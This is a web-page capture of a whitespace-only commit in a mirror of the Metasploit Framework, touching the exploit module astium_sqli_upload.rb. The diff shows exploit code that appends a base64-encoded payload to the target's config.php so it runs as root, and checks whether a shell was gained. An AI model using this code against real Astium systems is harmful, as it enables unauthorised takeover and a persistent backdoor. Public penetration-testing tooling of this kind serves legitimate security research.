infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Kill off EOL spaces on astium_sqli_upload.

bug/bundler_fix
Tod Beardsley 2013-10-03 11:01:27 -05:00
parent 0db93111de
commit fcba424308
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/exploits/linux/http/astium_sqli_upload.rb
View File

@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');"
# Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root,
# else during the config reload it might happen that an extra shell is spawned as the apache user.
phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"
phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"
phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"
phppayload << "fwrite($f, $orig . \"<?php if (posix_getuid() == 0) {\" . $replacement . \"} ?>\");"
phppayload << "fclose($f);"
@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 120)
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
# we don't have a shell, either.
if res and res.code != 200
print_error("#{peer} - Unexpected response...")
end